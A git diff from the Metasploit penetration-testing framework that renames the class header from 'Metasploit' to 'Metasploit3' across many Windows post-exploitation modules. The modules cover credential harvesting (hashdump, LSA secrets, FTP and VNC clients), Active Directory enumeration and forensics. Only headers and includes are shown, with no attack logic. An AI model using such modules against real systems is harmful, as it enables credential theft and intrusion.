+class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/credentials/smartermail.rb b/modules/post/windows/gather/credentials/smartermail.rb index aeaf7b23c7..cb0fce4d6e 100644 --- a/modules/post/windows/gather/credentials/smartermail.rb +++ b/modules/post/windows/gather/credentials/smartermail.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/smartftp.rb b/modules/post/windows/gather/credentials/smartftp.rb index 29e7cd9794..1fa9bba41f 100644 --- a/modules/post/windows/gather/credentials/smartftp.rb +++ b/modules/post/windows/gather/credentials/smartftp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex' require 'rexml/document' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::UserProfiles def initialize(info={}) diff --git a/modules/post/windows/gather/credentials/spark_im.rb b/modules/post/windows/gather/credentials/spark_im.rb index 601d5ba9d9..c3461846d4 100644 --- a/modules/post/windows/gather/credentials/spark_im.rb +++ b/modules/post/windows/gather/credentials/spark_im.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'openssl' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/credentials/sso.rb b/modules/post/windows/gather/credentials/sso.rb index 0eeb4935d7..d2584ecf2c 100644 --- a/modules/post/windows/gather/credentials/sso.rb +++ b/modules/post/windows/gather/credentials/sso.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/post/windows/priv' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Priv include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/steam.rb b/modules/post/windows/gather/credentials/steam.rb index 18b1020688..f17abf7c5c 100644 --- a/modules/post/windows/gather/credentials/steam.rb +++ b/modules/post/windows/gather/credentials/steam.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/tortoisesvn.rb b/modules/post/windows/gather/credentials/tortoisesvn.rb index b59dbb288f..731d3da103 100644 --- a/modules/post/windows/gather/credentials/tortoisesvn.rb +++ b/modules/post/windows/gather/credentials/tortoisesvn.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/credentials/total_commander.rb b/modules/post/windows/gather/credentials/total_commander.rb index e6fd5bcd99..1f51aabd04 100644 --- a/modules/post/windows/gather/credentials/total_commander.rb +++ b/modules/post/windows/gather/credentials/total_commander.rb @@ -8,7 +8,7 @@ require 'rex' require 'rex/parser/ini' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/trillian.rb b/modules/post/windows/gather/credentials/trillian.rb index fbff6131c3..a80e9bef9e 100644 --- a/modules/post/windows/gather/credentials/trillian.rb +++ b/modules/post/windows/gather/credentials/trillian.rb @@ -8,7 +8,7 @@ require 'rex' require 'rex/parser/ini' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/vnc.rb b/modules/post/windows/gather/credentials/vnc.rb index 67c2fef055..0442f20835 100644 --- a/modules/post/windows/gather/credentials/vnc.rb +++ b/modules/post/windows/gather/credentials/vnc.rb @@ -10,7 +10,7 @@ require 'rex' require 'msf/core/auxiliary/report' require 'rex/proto/rfb' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/windows_autologin.rb b/modules/post/windows/gather/credentials/windows_autologin.rb index bb4217be58..5af3bdb12d 100644 --- a/modules/post/windows/gather/credentials/windows_autologin.rb +++ b/modules/post/windows/gather/credentials/windows_autologin.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/winscp.rb b/modules/post/windows/gather/credentials/winscp.rb index bc6d4d2cbf..e9c4d452d1 100644 --- a/modules/post/windows/gather/credentials/winscp.rb +++ b/modules/post/windows/gather/credentials/winscp.rb @@ -9,7 +9,7 @@ require 'rex/parser/ini' require 'rex/parser/winscp' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/credentials/wsftp_client.rb b/modules/post/windows/gather/credentials/wsftp_client.rb index 60e9f05920..1227e572e2 100644 --- a/modules/post/windows/gather/credentials/wsftp_client.rb +++ b/modules/post/windows/gather/credentials/wsftp_client.rb @@ -9,7 +9,7 @@ require 'rex/parser/ini' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/dnscache_dump.rb b/modules/post/windows/gather/dnscache_dump.rb index 4b16e89c1a..de4bf2fefb 100644 --- a/modules/post/windows/gather/dnscache_dump.rb +++ b/modules/post/windows/gather/dnscache_dump.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/gather/dumplinks.rb b/modules/post/windows/gather/dumplinks.rb index a5054359f0..13d701aac1 100644 --- a/modules/post/windows/gather/dumplinks.rb +++ b/modules/post/windows/gather/dumplinks.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::Accounts diff --git a/modules/post/windows/gather/enum_ad_bitlocker.rb b/modules/post/windows/gather/enum_ad_bitlocker.rb index deb9a25dbd..2801d749ab 100644 --- a/modules/post/windows/gather/enum_ad_bitlocker.rb +++ b/modules/post/windows/gather/enum_ad_bitlocker.rb @@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/enum_ad_computers.rb b/modules/post/windows/gather/enum_ad_computers.rb index ac2d3a5511..27f3a742c3 100644 --- a/modules/post/windows/gather/enum_ad_computers.rb +++ b/modules/post/windows/gather/enum_ad_computers.rb @@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/enum_ad_groups.rb b/modules/post/windows/gather/enum_ad_groups.rb index f8e73403dc..ade732c27a 100644 --- a/modules/post/windows/gather/enum_ad_groups.rb +++ b/modules/post/windows/gather/enum_ad_groups.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP # include Msf::Post::Windows::Accounts diff --git a/modules/post/windows/gather/enum_ad_managedby_groups.rb b/modules/post/windows/gather/enum_ad_managedby_groups.rb index 1370b6cdfa..72959f6086 100644 --- a/modules/post/windows/gather/enum_ad_managedby_groups.rb +++ b/modules/post/windows/gather/enum_ad_managedby_groups.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/enum_ad_service_principal_names.rb b/modules/post/windows/gather/enum_ad_service_principal_names.rb index 13d69148f9..125c9feb59 100644 --- a/modules/post/windows/gather/enum_ad_service_principal_names.rb +++ b/modules/post/windows/gather/enum_ad_service_principal_names.rb @@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/enum_ad_to_wordlist.rb b/modules/post/windows/gather/enum_ad_to_wordlist.rb index 46aa415eb5..33f37b1bcf 100644 --- a/modules/post/windows/gather/enum_ad_to_wordlist.rb +++ b/modules/post/windows/gather/enum_ad_to_wordlist.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/enum_ad_user_comments.rb b/modules/post/windows/gather/enum_ad_user_comments.rb index b971571e05..22519eae57 100644 --- a/modules/post/windows/gather/enum_ad_user_comments.rb +++ b/modules/post/windows/gather/enum_ad_user_comments.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/enum_ad_users.rb b/modules/post/windows/gather/enum_ad_users.rb index b5d5cc5003..2fc5ed7779 100644 --- a/modules/post/windows/gather/enum_ad_users.rb +++ b/modules/post/windows/gather/enum_ad_users.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP include Msf::Post::Windows::Accounts diff --git a/modules/post/windows/gather/enum_applications.rb b/modules/post/windows/gather/enum_applications.rb index 9446b8c553..b3b2a25bab 100644 --- a/modules/post/windows/gather/enum_applications.rb +++ b/modules/post/windows/gather/enum_applications.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_artifacts.rb b/modules/post/windows/gather/enum_artifacts.rb index d5c5496542..2247ea9dc1 100644 --- a/modules/post/windows/gather/enum_artifacts.rb +++ b/modules/post/windows/gather/enum_artifacts.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'yaml' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Report include Msf::Post::File diff --git a/modules/post/windows/gather/enum_av_excluded.rb b/modules/post/windows/gather/enum_av_excluded.rb index ca1ee05879..0aa167b783 100644 --- a/modules/post/windows/gather/enum_av_excluded.rb +++ b/modules/post/windows/gather/enum_av_excluded.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry def initialize(info = {}) diff --git a/modules/post/windows/gather/enum_chrome.rb b/modules/post/windows/gather/enum_chrome.rb index 44e0fd612b..f1af882553 100644 --- a/modules/post/windows/gather/enum_chrome.rb +++ b/modules/post/windows/gather/enum_chrome.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/enum_computers.rb b/modules/post/windows/gather/enum_computers.rb index c04b586cce..8ecc9ee524 100644 --- a/modules/post/windows/gather/enum_computers.rb +++ b/modules/post/windows/gather/enum_computers.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File diff --git a/modules/post/windows/gather/enum_db.rb b/modules/post/windows/gather/enum_db.rb index da29a07b8c..27ff05d2ed 100644 --- a/modules/post/windows/gather/enum_db.rb +++ b/modules/post/windows/gather/enum_db.rb @@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_devices.rb b/modules/post/windows/gather/enum_devices.rb index a7924aac03..9829aa63e8 100644 --- a/modules/post/windows/gather/enum_devices.rb +++ b/modules/post/windows/gather/enum_devices.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_dirperms.rb b/modules/post/windows/gather/enum_dirperms.rb index 7e49b236f0..c772da1822 100644 --- a/modules/post/windows/gather/enum_dirperms.rb +++ b/modules/post/windows/gather/enum_dirperms.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Accounts diff --git a/modules/post/windows/gather/enum_domain.rb b/modules/post/windows/gather/enum_domain.rb index 8d0f312872..6d1c252834 100644 --- a/modules/post/windows/gather/enum_domain.rb +++ b/modules/post/windows/gather/enum_domain.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Priv def initialize(info={}) diff --git a/modules/post/windows/gather/enum_domain_group_users.rb b/modules/post/windows/gather/enum_domain_group_users.rb index 28a510d238..f9c2f877a3 100644 --- a/modules/post/windows/gather/enum_domain_group_users.rb +++ b/modules/post/windows/gather/enum_domain_group_users.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info = {}) super(update_info(info, 'Name' => 'Windows Gather Enumerate Domain Group', diff --git a/modules/post/windows/gather/enum_domain_tokens.rb b/modules/post/windows/gather/enum_domain_tokens.rb index a31427c1b2..c917d0be8d 100644 --- a/modules/post/windows/gather/enum_domain_tokens.rb +++ b/modules/post/windows/gather/enum_domain_tokens.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_domain_users.rb b/modules/post/windows/gather/enum_domain_users.rb index ce45ff9294..2ebfbb3208 100644 --- a/modules/post/windows/gather/enum_domain_users.rb +++ b/modules/post/windows/gather/enum_domain_users.rb @@ -4,7 +4,7 @@ require 'msf/core/post/common' require 'msf/core/post/windows/registry' require 'msf/core/post/windows/netapi' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Common include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_domains.rb b/modules/post/windows/gather/enum_domains.rb index 6d56f1bcb7..28dc44c576 100644 --- a/modules/post/windows/gather/enum_domains.rb +++ b/modules/post/windows/gather/enum_domains.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/post/windows/netapi' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::NetAPI diff --git a/modules/post/windows/gather/enum_files.rb b/modules/post/windows/gather/enum_files.rb index 506f96c3d8..3b28a296ed 100644 --- a/modules/post/windows/gather/enum_files.rb +++ b/modules/post/windows/gather/enum_files.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/enum_hostfile.rb b/modules/post/windows/gather/enum_hostfile.rb index b4c17563d3..9f2d188091 100644 --- a/modules/post/windows/gather/enum_hostfile.rb +++ b/modules/post/windows/gather/enum_hostfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/gather/enum_ie.rb b/modules/post/windows/gather/enum_ie.rb index b2f2561eb6..846df38f16 100644 --- a/modules/post/windows/gather/enum_ie.rb +++ b/modules/post/windows/gather/enum_ie.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_logged_on_users.rb b/modules/post/windows/gather/enum_logged_on_users.rb index 5790f34c65..fc5958c96c 100644 --- a/modules/post/windows/gather/enum_logged_on_users.rb +++ b/modules/post/windows/gather/enum_logged_on_users.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Accounts diff --git a/modules/post/windows/gather/enum_ms_product_keys.rb b/modules/post/windows/gather/enum_ms_product_keys.rb index 2a9bcbaf7e..ae2d0bc3a6 100644 --- a/modules/post/windows/gather/enum_ms_product_keys.rb +++ b/modules/post/windows/gather/enum_ms_product_keys.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_muicache.rb b/modules/post/windows/gather/enum_muicache.rb index a1f5bbca11..4644a8823a 100644 --- a/modules/post/windows/gather/enum_muicache.rb +++ b/modules/post/windows/gather/enum_muicache.rb @@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'rex/registry' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_patches.rb b/modules/post/windows/gather/enum_patches.rb index 94a3f5dc80..a6c4162dfd 100644 --- a/modules/post/windows/gather/enum_patches.rb +++ b/modules/post/windows/gather/enum_patches.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/post/common' require 'msf/core/post/windows/extapi' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Common include Msf::Post::Windows::ExtAPI diff --git a/modules/post/windows/gather/enum_powershell_env.rb b/modules/post/windows/gather/enum_powershell_env.rb index b52f0095a2..41ca9b2119 100644 --- a/modules/post/windows/gather/enum_powershell_env.rb +++ b/modules/post/windows/gather/enum_powershell_env.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/enum_prefetch.rb b/modules/post/windows/gather/enum_prefetch.rb index e42decd245..f6edb22bf1 100644 --- a/modules/post/windows/gather/enum_prefetch.rb +++ b/modules/post/windows/gather/enum_prefetch.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_proxy.rb b/modules/post/windows/gather/enum_proxy.rb index 4f16ddcf8b..bb98d36e77 100644 --- a/modules/post/windows/gather/enum_proxy.rb +++ b/modules/post/windows/gather/enum_proxy.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Post::Windows::Services diff --git a/modules/post/windows/gather/enum_putty_saved_sessions.rb b/modules/post/windows/gather/enum_putty_saved_sessions.rb index d33ae86b86..00d38c0806 100644 --- a/modules/post/windows/gather/enum_putty_saved_sessions.rb +++ b/modules/post/windows/gather/enum_putty_saved_sessions.rb @@ -8,7 +8,7 @@ require 'msf/core/post/windows/priv' require 'msf/core/post/common' require 'msf/core/post/windows/registry' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Common include Msf::Post::File diff --git a/modules/post/windows/gather/enum_services.rb b/modules/post/windows/gather/enum_services.rb index 427d160367..eff601943b 100644 --- a/modules/post/windows/gather/enum_services.rb +++ b/modules/post/windows/gather/enum_services.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Services diff --git a/modules/post/windows/gather/enum_shares.rb b/modules/post/windows/gather/enum_shares.rb index cbbadb4714..b0dfe05714 100644 --- a/modules/post/windows/gather/enum_shares.rb +++ b/modules/post/windows/gather/enum_shares.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/enum_snmp.rb b/modules/post/windows/gather/enum_snmp.rb index d7059284ac..9316605288 100644 --- a/modules/post/windows/gather/enum_snmp.rb +++ b/modules/post/windows/gather/enum_snmp.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/enum_termserv.rb b/modules/post/windows/gather/enum_termserv.rb index 28d313127d..2ad65c80e2 100644 --- a/modules/post/windows/gather/enum_termserv.rb +++ b/modules/post/windows/gather/enum_termserv.rb @@ -10,7 +10,7 @@ require 'rex' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/enum_tokens.rb b/modules/post/windows/gather/enum_tokens.rb index 3df7998151..4a7838d3cd 100644 --- a/modules/post/windows/gather/enum_tokens.rb +++ b/modules/post/windows/gather/enum_tokens.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Priv def initialize(info={}) diff --git a/modules/post/windows/gather/enum_tomcat.rb b/modules/post/windows/gather/enum_tomcat.rb index b50e705dc1..2f98e036c6 100644 --- a/modules/post/windows/gather/enum_tomcat.rb +++ b/modules/post/windows/gather/enum_tomcat.rb @@ -8,7 +8,7 @@ require 'rexml/document' require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_unattend.rb b/modules/post/windows/gather/enum_unattend.rb index 156210b552..09dea61737 100644 --- a/modules/post/windows/gather/enum_unattend.rb +++ b/modules/post/windows/gather/enum_unattend.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/parser/unattend' require 'rexml/document' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File diff --git a/modules/post/windows/gather/file_from_raw_ntfs.rb b/modules/post/windows/gather/file_from_raw_ntfs.rb index 07badf8821..2500d9226f 100644 --- a/modules/post/windows/gather/file_from_raw_ntfs.rb +++ b/modules/post/windows/gather/file_from_raw_ntfs.rb @@ -5,7 +5,7 @@ require 'rex/parser/fs/ntfs' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::Error diff --git a/modules/post/windows/gather/forensics/browser_history.rb b/modules/post/windows/gather/forensics/browser_history.rb index e99ff1588e..161789429b 100644 --- a/modules/post/windows/gather/forensics/browser_history.rb +++ b/modules/post/windows/gather/forensics/browser_history.rb @@ -10,7 +10,7 @@ require 'msf/core/post/windows/user_profiles' require 'msf/core/post/windows/registry' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/forensics/duqu_check.rb b/modules/post/windows/gather/forensics/duqu_check.rb index dfa700b536..c967b5f6ab 100644 --- a/modules/post/windows/gather/forensics/duqu_check.rb +++ b/modules/post/windows/gather/forensics/duqu_check.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/forensics/enum_drives.rb b/modules/post/windows/gather/forensics/enum_drives.rb index 293c83d887..34b24c51cb 100644 --- a/modules/post/windows/gather/forensics/enum_drives.rb +++ b/modules/post/windows/gather/forensics/enum_drives.rb @@ -11,7 +11,7 @@ # Mississippi State University National Forensics Training Center # http://msu-nftc.org -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/gather/forensics/imager.rb b/modules/post/windows/gather/forensics/imager.rb index 5d0545e3c5..209a90c492 100644 --- a/modules/post/windows/gather/forensics/imager.rb +++ b/modules/post/windows/gather/forensics/imager.rb @@ -14,7 +14,7 @@ require 'digest/md5' require 'digest/sha1' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/gather/forensics/nbd_server.rb b/modules/post/windows/gather/forensics/nbd_server.rb index db7f052e99..2a029ce6a3 100644 --- a/modules/post/windows/gather/forensics/nbd_server.rb +++ b/modules/post/windows/gather/forensics/nbd_server.rb @@ -14,7 +14,7 @@ # Mississippi State University National Forensics Training Center # http://msu-nftc.org -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/gather/forensics/recovery_files.rb b/modules/post/windows/gather/forensics/recovery_files.rb index e68a5b64cb..c32cfa7420 100644 --- a/modules/post/windows/gather/forensics/recovery_files.rb +++ b/modules/post/windows/gather/forensics/recovery_files.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/hashdump.rb b/modules/post/windows/gather/hashdump.rb index 9ee1fe28d4..0f4b866d16 100644 --- a/modules/post/windows/gather/hashdump.rb +++ b/modules/post/windows/gather/hashdump.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/local_admin_search_enum.rb b/modules/post/windows/gather/local_admin_search_enum.rb index e7555431f7..96fbc11ccf 100644 --- a/modules/post/windows/gather/local_admin_search_enum.rb +++ b/modules/post/windows/gather/local_admin_search_enum.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Priv include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/lsa_secrets.rb b/modules/post/windows/gather/lsa_secrets.rb index cd5d3436c0..812691a029 100644 --- a/modules/post/windows/gather/lsa_secrets.rb +++ b/modules/post/windows/gather/lsa_secrets.rb @@ -8,7 +8,7 @@ require 'msf/core/post/windows/priv' require 'msf/core/post/common' require 'msf/core/post/windows/registry' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Common include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/memory_grep.rb b/modules/post/windows/gather/memory_grep.rb index b3a8dd138a..936aae5cf2 100644 --- a/modules/post/windows/gather/memory_grep.rb +++ b/modules/post/windows/gather/memory_grep.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super( update_info(info, diff --git a/modules/post/windows/gather/netlm_downgrade.rb b/modules/post/windows/gather/netlm_downgrade.rb index cb2cc8bb35..b1dca4c2a8 100644 --- a/modules/post/windows/gather/netlm_downgrade.rb +++ b/modules/post/windows/gather/netlm_downgrade.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::WindowsServices diff --git a/modules/post/windows/gather/outlook.rb b/modules/post/windows/gather/outlook.rb index ea739c055b..92269c8d9c 100644 --- a/modules/post/windows/gather/outlook.rb +++ b/modules/post/windows/gather/outlook.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Powershell diff --git a/modules/post/windows/gather/phish_windows_credentials.rb b/modules/post/windows/gather/phish_windows_credentials.rb index 60a0592951..f01d8c6b95 100644 --- a/modules/post/windows/gather/phish_windows_credentials.rb +++ b/modules/post/windows/gather/phish_windows_credentials.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Powershell diff --git a/modules/post/windows/gather/resolve_sid.rb b/modules/post/windows/gather/resolve_sid.rb index fa8592946c..d0ead5f552 100644 --- a/modules/post/windows/gather/resolve_sid.rb +++ b/modules/post/windows/gather/resolve_sid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Accounts diff --git a/modules/post/windows/gather/reverse_lookup.rb b/modules/post/windows/gather/reverse_lookup.rb index c41d5da4e8..99cee3b42e 100644 --- a/modules/post/windows/gather/reverse_lookup.rb +++ b/modules/post/windows/gather/reverse_lookup.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/gather/screen_spy.rb b/modules/post/windows/gather/screen_spy.rb index f1891cda36..f351301a9e 